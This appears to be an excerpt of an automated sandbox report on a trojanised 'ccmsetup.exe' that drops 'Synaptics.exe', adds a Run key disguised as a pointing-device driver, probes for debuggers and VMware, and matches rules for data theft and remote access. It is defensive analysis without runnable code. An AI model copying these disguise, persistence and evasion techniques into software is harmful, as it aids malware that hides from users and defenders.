                              Source: Binary string: X:\bt\1024777\repo\out\retail-x86\ccmsetup\ccmsetup.pdb} source: ccmsetup.exe, ._cache_ccmsetup.exe.0.dr, Synaptics.exe.0.dr
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Code function: 2_2_005B4BBD __EH_prolog3_catch_GS,LoadLibraryW,GetProcAddress,GetLastError,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,CoTaskMemFree,2_2_005B4BBD
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_09CB1543 push ss; retf 3_2_09CB154A
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_09CB5565 push ebp; retf 3_2_09CB5576
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_09CB5565 push ebp; retf 3_2_09CB558A
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_09CB111B push ss; retf 3_2_09CB1126
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_09CB48EC push 4ADC76FAh; retf 3_2_09CB48F2
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_09CB30FB push ss; retf 3_2_09CB30FE

                              Persistence and Installation Behavior

                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\BJZFPPWAPT\~$cache1
                              Source: C:\Users\user\Desktop\ccmsetup.exeFile created: C:\Users\user\Desktop\._cache_ccmsetup.exe
                              Source: C:\Users\user\Desktop\ccmsetup.exeFile created: C:\ProgramData\Synaptics\RCXD7AF.tmp
                              Source: C:\Users\user\Desktop\ccmsetup.exeFile created: C:\ProgramData\Synaptics\Synaptics.exe
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeFile created: C:\Windows\ccmsetup\Logs\ccmsetup.log
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_0059892F __EH_prolog3_catch_GS,OpenSCManagerW,GetLastError,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,CreateServiceW,GetLastError,GetCurrentThreadId,StartServiceW,GetLastError,GetCurrentThreadId,OpenServiceW,GetLastError,GetCurrentThreadId,QueryServiceStatus,Sleep,DeleteService,GetLastError,CloseServiceHandle,Sleep,OpenServiceW,GetLastError,ControlService,Sleep,GetCurrentThreadId,CloseServiceHandle,CloseServiceHandle,2_2_0059892F
                              Source: C:\Users\user\Desktop\ccmsetup.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver
                              Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                              Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                              Source: C:\Users\user\Desktop\ccmsetup.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 3_2_09CB30E4 sldt word ptr [eax] 3_2_09CB30E4
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Code function: __EH_prolog3_catch_GS,GetAdaptersInfo,GetCurrentThreadId,GetCurrentThreadId,GetAdaptersInfo,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,2_2_006763D8
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Evaded block: after key decision graph_2-79270
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_2-75557
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe API coverage: 3.3 %
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 5736 Thread sleep count: 87 > 30
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 5736 Thread sleep time: -5220000s >= -30000s
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 8656 Thread sleep time: -60000s >= -30000s
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Code function: 2_2_0057E422 __EH_prolog3_catch_GS,FindFirstFileW,GetLastError,DeleteFileW,GetLastError,FindNextFileW,FindClose,2_2_0057E422
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Code function: 2_2_005F2842 __EH_prolog3_catch_GS,FindFirstFileW,FindNextFileW,DeleteFileW,GetFileInformationByHandle,GetCurrentThreadId,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,CopyFileW,GetLastError,GetCurrentThreadId,GetLastError,FindClose,2_2_005F2842
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Code function: 2_2_00589401 __EH_prolog3_catch_GS,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,FindFirstFileW,FindNextFileW,FindClose,2_2_00589401
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Code function: 2_2_0060581F __EH_prolog3_catch_GS,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,FindFirstFileW,GetLastError,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,CopyFileW,GetLastError,GetCurrentThreadId,FindNextFileW,FindClose,2_2_0060581F
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Code function: 2_2_00587953 __EH_prolog3_catch_GS,GetCurrentThreadId,FindFirstFileW,FindNextFileW,FindClose,GetCurrentThreadId,2_2_00587953
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Code function: 2_2_0057DD9A __EH_prolog3_catch_GS,FindFirstFileW,FindNextFileW,FindClose,RemoveDirectoryW,GetLastError,DeleteFileW,GetLastError,GetCurrentThreadId,FindClose,2_2_0057DD9A
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Code function: 2_2_005FB59B __EH_prolog3_catch,GetSystemInfo,GetCurrentThreadId,GetModuleHandleW,GetLastError,GetCurrentThreadId,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,GetLastError,GetCurrentThreadId,GetNativeSystemInfo,GetCurrentThreadId,2_2_005FB59B
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Thread delayed: delay time: 60000
                              Source: C:\Users\user\Desktop\ccmsetup.exe File opened: C:\Users\user
                              Source: C:\Users\user\Desktop\ccmsetup.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                              Source: C:\Users\user\Desktop\ccmsetup.exe File opened: C:\Users\user\AppData\Roaming
                              Source: C:\Users\user\Desktop\ccmsetup.exe File opened: C:\Users\user\AppData
                              Source: C:\Users\user\Desktop\ccmsetup.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                              Source: C:\Users\user\Desktop\ccmsetup.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                              Source: Amcache.hve.12.dr Binary or memory string: VMware
                              Source: ccmsetup.exe, 00000000.00000003.2037350787.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}o
                              Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual USB Mouse
                              Source: Amcache.hve.12.dr Binary or memory string: vmci.syshbin
                              Source: Amcache.hve.12.dr Binary or memory string: VMware, Inc.
                              Source: Amcache.hve.12.dr Binary or memory string: VMware20,1hbin@
                              Source: Amcache.hve.12.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                              Source: Amcache.hve.12.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                              Source: Amcache.hve.12.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                              Source: Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                              Source: Amcache.hve.12.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                              Source: Amcache.hve.12.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                              Source: Amcache.hve.12.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
                              Source: Amcache.hve.12.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                              Source: Amcache.hve.12.dr Binary or memory string: vmci.sys
                              Source: Amcache.hve.12.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                              Source: Amcache.hve.12.dr Binary or memory string: vmci.syshbin`
                              Source: Amcache.hve.12.dr Binary or memory string: \driver\vmci,\driver\pci
                              Source: Amcache.hve.12.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                              Source: Amcache.hve.12.dr Binary or memory string: VMware20,1
                              Source: Amcache.hve.12.dr Binary or memory string: Microsoft Hyper-V Generation Counter
                              Source: Amcache.hve.12.dr Binary or memory string: NECVMWar VMware SATA CD00
                              Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
                              Source: Amcache.hve.12.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                              Source: Amcache.hve.12.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                              Source: Amcache.hve.12.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                              Source: Amcache.hve.12.dr Binary or memory string: VMware PCI VMCI Bus Device
                              Source: Amcache.hve.12.dr Binary or memory string: VMware VMCI Bus Device
                              Source: Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWK
                              Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual RAM
                              Source: Amcache.hve.12.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                              Source: Amcache.hve.12.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information queried: ProcessInformation
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Process queried: DebugPort
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Code function: 2_2_005D0A72 IsDebuggerPresent,OutputDebugStringW,2_2_005D0A72
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Code function: 2_2_005DCE62 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_005DCE62
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Code function: 2_2_005B4BBD __EH_prolog3_catch_GS,LoadLibraryW,GetProcAddress,GetLastError,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,CoTaskMemFree,2_2_005B4BBD
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Code function: 2_2_006158BF HeapCreate,HeapQueryInformation,HeapSetInformation,GetProcessHeap,2_2_006158BF
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Code function: 2_2_005D57B7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_005D57B7
                              Source: C:\Users\user\Desktop\ccmsetup.exe Process created: C:\Users\user\Desktop\._cache_ccmsetup.exe "C:\Users\user\Desktop\._cache_ccmsetup.exe"
                              Source: C:\Users\user\Desktop\ccmsetup.exe Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Code function: 2_2_005B1B1C GetSecurityDescriptorDacl,_free,_malloc,InitializeAcl,IsValidAcl,SetSecurityDescriptorDacl,GetSecurityDescriptorSacl,_malloc,InitializeAcl,IsValidAcl,SetSecurityDescriptorSacl,GetSecurityDescriptorOwner,GetSecurityDescriptorGroup,GetSecurityDescriptorControl,SetSecurityDescriptorControl,GetLastError,_free,IsValidSecurityDescriptor,2_2_005B1B1C
                              Source: C:\Users\user\Desktop\ccmsetup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Code function: 2_2_005F094C __EH_prolog3_catch_GS,GetCurrentThreadId,GetCurrentThread,GetThreadTimes,GetSystemTimeAsFileTime,GetCurrentThreadId,2_2_005F094C
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Code function: 2_2_005F10F0 __EH_prolog3_catch_GS,GetLocalTime,GetTimeZoneInformation,_wcsrchr,GetCurrentThreadId,2_2_005F10F0
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Code function: 2_2_005FBD05 __EH_prolog3_catch_GS,GetVersionExW,GetLastError,GetCurrentThreadId,GetModuleHandleW,GetProcAddress,GetLastError,GetCurrentThreadId,2_2_005FBD05
                              Source: Amcache.hve.12.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                              Source: Amcache.hve.12.dr Binary or memory string: msmpeng.exe
                              Source: Amcache.hve.12.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
                              Source: Amcache.hve.12.dr Binary or memory string: MsMpEng.exe

                              Stealing of Sensitive Information

                              Source: Yara match File source: ccmsetup.exe, type: SAMPLE
                              Source: Yara match File source: 0.0.ccmsetup.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara match File source: 00000003.00000003.2109250018.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: 00000000.00000000.2022900400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match File source: Process Memory Space: ccmsetup.exe PID: 4512, type: MEMORYSTR
                              Source: Yara match File source: Process Memory Space: Synaptics.exe PID: 2180, type: MEMORYSTR
                              Source: Yara match File source: C:\ProgramData\Synaptics\RCXD7AF.tmp, type: DROPPED
                              Source: Yara match File source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1, type: DROPPED
                              Source: Yara match File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

                              Remote Access Functionality

                              Source: Yara match File source: ccmsetup.exe, type: SAMPLE
                              Source: Yara match File source: 0.0.ccmsetup.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara match File source: 00000003.00000003.2109250018.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: 00000000.00000000.2022900400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
